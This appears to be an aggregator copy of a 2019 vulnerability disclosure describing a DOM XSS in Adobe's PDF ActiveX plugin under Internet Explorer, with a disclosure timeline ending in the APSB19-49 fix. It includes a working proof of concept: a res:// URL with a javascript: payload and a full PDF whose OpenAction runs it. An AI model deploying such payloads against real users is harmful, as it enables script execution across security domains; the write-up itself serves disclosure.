Self XSS using IE adobes

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 22 hours ago · vulnerability
quality 7/10 · good
0 net
AI Summary

A DOM XSS vulnerability in Adobe's PDF ActiveX plugin (res://apds.dll/redirect.html) can be exploited via IE by using the xfa.host.gotoURL() function to bypass same-origin policy restrictions and execute arbitrary JavaScript without security warnings. The vulnerability chains a parameter injection flaw with Adobe's insecure URL redirect handling to achieve cross-domain XSS.

Tags
dom-xss cross-site-scripting internet-explorer adobe-pdf activex res-protocol pdf-exploit javascript-injection vulnerability-disclosure
Entities
CVE-2019-8160 APSB19-49 Adobe PSIRT MSRC KnownSec 404 Team Heige apds.dll
From http:// domain to res:// domain xss by using IE Adobe's PDF ActiveX plugin | by heige - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original From http:// domain to res:// domain xss by using IE Adobe's PDF ActiveX plugin by Heige(a.k.a Superhei) of KnownSec 404 Team 03/19/2019 heige Follow ~2 min read · March 19, 2019 (Updated: December 8, 2021) · Free: Yes [Article release: https://paper.seebug.org/860/ ] 1 res://apds.dll/redirect.html dom xss https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&desc=5 had reported an xss vulnerability in res://apds.dll/redirect.html. And this vulnerability has not been fixed until now. this vulnerability is a typical dom xss vulnerability form the res://apds.dll/redirect.html code: POC: res://apds.dll/redirect.html?target=javascript:alert(1) 2 from http:// domain to res:// domain Usually accessing res:// resources via http:// domain is not allowed. The Javascript function xfa.host.gotoURL() in Adobe PDF can access multiple URLs include http(s):// file:// etc. Of course, in general, there will be security tips when you open the PDF files. But when we use xfa.host.gotoURL() to access res:// or http(s):// by IE Adobe's PDF ActiveX plugin : xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//"); there are no security alerts. and the xss payload "alert(1)" is executed. POC: http://xxxxxxx/r.pdf r.pdf code: %PDF-1.4 1 0 obj <<>> %endobj 2 0 obj <<>> stream 1 endstream endobj trailer << /Root << /Pages <<>> /AcroForm << /XFA 2 0 R >> /OpenAction << /S/JavaScript /JS( xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//"); ) >> >> >> demo tweet https://twitter.com/80vul/status/1048576146835558400 3 fixed? Due to some security domain isolation of IE, the harm of res:// domain xss is limited. But I think Microsoft should actively fix the res://apds.dll/redirect.html xss vulnerability, and Adobe should disable or give corresponding security warnings when URL redirect,The world can be more beautiful and harmonious! 4 Timeline October 04, 2018 Report it to Adobe PSIRT and MSRC October 05, 2018 Adobe tracking number PSIRT-8981. October 09, 2018 MSRC Case 47932 CRM:0461065793 October 18, 2018 Adobe PSIRT has been investigating and still November 21, 2018 MSRC have completed our investigation and determined that the case doesn't meet the bar for immediate servicing in a security update. March 19, 2019 Public October 15,2019 Adobe fix it in the APSB19–49 (CVE-2019–8160) https://helpx.adobe.com/security/products/acrobat/apsb19-49.html #javascript #xss-attack #knownsec Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories